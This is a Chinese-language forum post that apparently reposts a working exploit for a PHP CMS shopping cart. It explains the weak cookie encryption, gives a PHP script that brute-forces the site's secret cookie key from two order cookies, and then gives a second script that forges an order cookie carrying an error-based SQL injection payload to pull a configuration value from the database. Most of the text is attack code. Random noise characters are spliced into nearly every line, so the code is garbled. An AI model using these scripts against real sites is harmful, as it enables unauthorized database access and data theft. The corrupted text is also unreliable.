www.xxx.com/plus/search.php?keyword=$ ^- } n) w1 S! I
在 include/shopcar.class.php中
6 V1 Z/ d' `1 s c3 ]/ o/ ]$ A先看一下这个shopcar类是如何生成cookie的
# m) ]/ U% F1 V4 K: [239 function saveCookie($key,$value): D3 _# ^5 r* h+ r' n
240 {2 |" R' O: d1 P- `/ P" k
241 if(is_array($value))
. [9 b) c3 M r* s2 X+ a242 {% U- j# Y& O% ? n, i; H0 u" X
243 $value = $this->enCrypt($this->enCode($value));/ z) }& b$ p0 N6 d" F
244 }
4 C' R- {1 g1 `% e245 else
6 H X6 m$ E0 ?3 x+ c246 {# B' p" D, X1 h E1 R
247 $value = $this->enCrypt($value);
2 n% }5 G, q; U7 K4 s* P1 @9 z! F248 }
9 _: ?4 I2 U$ h7 M249 setcookie($key,$value,time()+36000,’/');5 f. Y2 \6 p- V/ Z9 e$ ^
250 }
% F7 A: j% Q& q/ T简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数- M4 e8 |" D* Z* C L' k
186 function enCrypt($txt)
2 g! Q# ]) N& F9 e. b- S187 {" m* t5 s4 L% K
188 srand((double)microtime() * 1000000);
9 E2 W. q' Q0 V! @/ m. Y! i189 $encrypt_key = md5(rand(0, 32000));8 [! x- a& r0 s; |# B
190 $ctr = 0;
8 B$ p& q" H( l" T; T191 $tmp = ”;7 d n" _$ G0 N* D' v5 `
192 for($i = 0; $i < strlen($txt); $i++)
@/ D) F+ G: T* p" s+ R8 r193 {
7 l4 o1 O- n! j$ t5 z194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
9 l* ` t9 I2 X195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
8 {5 l' B' w: \( Z196 }
6 U, Z1 i* i8 [+ |( Y197 return base64_encode($this->setKey($tmp));
- p+ W$ V6 h- {# g( \% o& x' O198 }# L9 [: I" ]9 W) A; y$ \6 q
213 function setKey($txt)
0 S4 J" M, M- I$ Y9 R214 {# e" I; A, {1 v) s
215 global $cfg_cookie_encode;4 C# F2 U- E5 F) l- P& q/ P3 O
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));% Q d+ P+ D4 \' |
217 $ctr = 0;
# U. Q; N: I \+ o7 V+ ~218 $tmp = ”;
0 V+ L4 v) e; q6 V3 k* W) c$ a219 for($i = 0; $i < strlen($txt); $i++)3 p O4 f' b: d; _. V# s$ C5 M; O& G& t: n
220 {# n+ `: U7 `) k5 k2 Z% ?. u
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( u+ w/ L6 J0 ~: a9 L6 p
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];9 V- ~" ]/ S% a& U4 M/ E
223 }6 F2 y% X0 J( x* I2 O
224 return $tmp; s- u/ h d# j! M
225 }% s- C7 s i( }
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的3 e" r3 U( I6 f
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。. S5 y% l% o; h, v( x$ S9 @, R
具体代码如下:. q0 r* N$ V2 p+ ?1 X
<?php1 [# ]* G, p! `3 d' h; [. i
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here" m0 a2 F' z& P D. t( i
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here% f1 A$ K0 t6 {( n: @% I4 l) ^
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
h6 o9 ?- F& ^function reStrCode($code,$string)6 w4 { w# f$ ~3 U/ O
{
$ P, g' p3 F4 K$ |5 g1 H$code = base64_decode($code);
0 R# p1 \5 y5 f# ]( M, v! D$ k ~$key = “”;
) u7 K9 A% F8 G! F5 efor($i=0 ; $i<32 ; $i++)
' E0 g% `& V; Q& W{& y R; d4 q1 y9 I/ m3 W
$key .= $string[$i] ^ $code[$i];
. {: c+ z* Z+ z& T7 }% E$ b A}7 f7 V4 h" F- g5 m @3 S* {5 ~& |4 P* |
return $key;6 M/ m' K7 E' e g
}
/ H* V5 v0 V% E: u. D# i4 ?function getKeys($cookie,$plantxt) [& ?8 P7 O: X$ d
{$ l5 e. h4 F4 o
$tmp = $cookie;
# t1 B, [# ]7 p" w) o6 }8 E$results = array();# \1 E9 I$ x- `
for($j=0 ; $j < 32000; $j++); Y7 }$ Z% U" O# ]0 }
{
' t& k5 d1 h9 L8 D8 ^8 y! a) R
6 N8 R! n. ^& \$txt = $plantxt;
+ Z L; d; a) Y2 b! t# d: x$ctr = 0;5 G, j7 v! o5 u/ E6 }! K( |- h4 M
$tmp = ”;8 |% i' c* p6 y0 o u
$encrypt_key = md5($j);: D1 B& ?- u4 r; F5 d# W& I
for($i =0; $i < strlen($txt); $i ++)
* `( h' \* x3 [{& [' w# ~3 K7 r. T9 s8 B! L# t# T3 M" F
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
0 I0 o) M6 L6 ~) H0 R) E+ d$ m$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);8 Y) A1 N' D9 m$ E! g, i
}* F( U d* g* ~# b
$string = $tmp;
* D6 e! P" ?% h9 H: _$code = $cookie;
7 c/ o) d( J4 ]* j% E# _1 K4 D& g$result = reStrCode($code,$string);
; T2 e% ~$ T: \% l+ _if(eregi(‘^[a-z0-9]+$’,$result))
" S0 W M8 x9 V9 W/ h( M$ g1 J4 Z{, [- h/ |3 [2 ?; o( W2 D- \
echo $result.”\n”;5 L0 b0 S. e# T/ K3 l/ o: [/ S' k1 |
$results[] = $result;2 A: V7 T/ {% J p
}3 m9 m: Q. e! h2 ^
}. p+ c% A! A. d( G# h/ b
return $results;2 Z7 V: J& I5 `" L
}
4 {. ^6 v0 L( p$results1 = getKeys($cookie1,$plantxt);) N3 m& ~; L& ^
$results2 = getKeys($cookie2,$plantxt);( C, K Y) Z; j# }* `% p4 N
print “\n——————–real key————————–\n”;
) V1 m( v7 x, F. d1 y; Gforeach($results1 as $test1)
$ V H8 k5 \$ G# P- S* i{" h7 [' c: }5 F1 O3 Z, d; A% P
foreach($results2 as $test2)
3 Y: p2 E* H9 }4 r{2 b7 T# S; `- g5 }. ^" u
if($test1 == $test2)
, U: C* s3 a+ G* E' d{8 x+ r2 U. E& q: d) s9 l
echo $test1.”\n”;1 _8 ]2 n) X' c" ~9 S
}
; x) L- s7 K8 S. D9 K0 ]2 i}: d& q. h4 u ]3 W
}* y& v/ _) @4 l6 t' f) V( g' @4 Y
?>+ Z2 F* R, m- e! J' w" _$ P
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,( ~9 f8 z9 @) Y' V9 J3 U- y: p
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
; u$ n# w! R8 U! }然后推算出md5(strtolower($cfg_cookie_encode))
3 O( y% i3 S+ I/ U4 d得到这个key之后,我们就可以构造任意购物车的cookie
, `7 s' F6 V( z9 x* F0 L" `+ L接着看
# a8 T, u9 q- I0 ^$ v20 class MemberShops( L% {" o4 l! U5 R! M
21 {
0 m3 r; D3 T/ E3 _$ P* h/ M22 var $OrdersId;
1 d1 U' k) }& B2 C; ^- z23 var $productsId;4 ]( B( ~7 ^9 c/ W
24+ y. L# K' ^; s* m- O
25 function __construct()
: b# ^# P+ i) [) S4 a- {9 n' `26 {
# ^, B( c% \$ M- u& }0 s$ R# U27 $this->OrdersId = $this->getCookie(“OrdersId”);
: K* c! {/ _; T, @" l28 if(empty($this->OrdersId))- u1 i0 Z. A' }
29 {6 k8 d' C. G; }( a v M$ ^0 I `5 u
30 $this->OrdersId = $this->MakeOrders();9 I2 J9 {+ p) X" D& v' {; ]5 X; [
31 }* p: z0 j& Y( v# o9 C1 d
32 }
+ i. x7 m; T6 j8 M发现OrderId是从cookie里面获取的5 }( X7 r" ?/ y# Q8 o P
然后
+ z, p9 @9 |& z8 H0 P4 Y3 G/plus/carbuyaction.php中的
5 u$ x* Q+ F% H# _) D% Q& V* Y29 $cart = new MemberShops();
& ~' [% Y4 O& N& y3 [) v3 L; [39 $OrdersId = $cart->OrdersId; //本次记录的订单号
( m O l6 W0 t+ ^; M) l……
5 c- ~$ ?; ^3 G! C173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
6 r* m; Z; S1 |& [' I [接着我们就可以注入了
2 M( G! z5 b. r) w+ b+ a通过利用下面代码生成cookie:
" n5 I4 c9 v$ g: R/ S<?php/ v, U$ H% P: X5 @. a+ g; [
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
! O# D# r* b4 E) T$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here, K( b/ K8 N8 E" F6 P9 K: m7 ]- z
function setKey($txt)
9 M. R3 Q: K$ b" B' {0 o- p1 a) E{
' Z5 L% R. i+ u2 C }/ M% r+ N* Zglobal $encrypt_key;
1 q" @- b1 S: N5 c6 G$ctr = 0;
# J+ U9 h0 Z. s" H- l$tmp = ”;- P8 l! \7 Z; \; y
for($i = 0; $i < strlen($txt); $i++)
7 [. K( ^6 n/ b. G+ s) f: t5 k{
2 l3 d0 e/ v6 L* ^$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- e$ {6 W3 S9 T+ l& S) v
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
r- u2 E. b4 N}
( z1 G! |, N4 n9 Q5 |' t& j* M3 Z" @return $tmp;! }. N. m% R( R/ ^/ b9 O: |! Q) v
}
, u( m4 A& D8 X5 ffunction enCrypt($txt)
# m. n0 N1 V n& x* I9 }6 @4 y{
; z3 V* u5 J4 L6 Fsrand((double)microtime() * 1000000);9 V9 a) p2 X0 N, U
$encrypt_key = md5(rand(0, 32000));
% |( z& G/ _7 q2 q L7 A$ctr = 0;
( \" R8 O, @6 z( q9 u+ V$tmp = ”;7 p: F& L' b: ~/ h( T8 Q" N
for($i = 0; $i < strlen($txt); $i++)7 x5 J$ w7 u4 l* J P# U4 x
{0 ~! S1 B/ U: p$ i
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ x0 ?( n6 f" p$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);- O `; h" p3 y' c% X
}0 F' I3 ?* O% G* R
return base64_encode(setKey($tmp));7 L/ i( Z) s: k- U" {
}
& f" o6 M" ^0 ^# A' X% H$ Zfor($dest =0;$dest = enCrypt($txt);)6 o% ^- ?: \' G! ]3 z6 t- H; H
{
; A, L" r% A1 W; K: zif(!strpos($dest,’+'))
7 |7 j8 j* {' d: a{* T0 O, t( a: _* w/ h4 h1 m% \
break;( X* ]5 c: ^, }" h$ x
}' U. n. ?$ B) ?; b0 V* B
}
6 w/ ?) T8 B4 ~- }0 U5 a# Aecho $dest.”\n”;
% z; s: O& G1 X+ I2 J?>
+ t% J5 U; o* S3 o
# G% v. q( P) U6 {2 f4 x7 W6 a8 v |
发表于 2013-2-13 23:58:29
收藏
支持
反对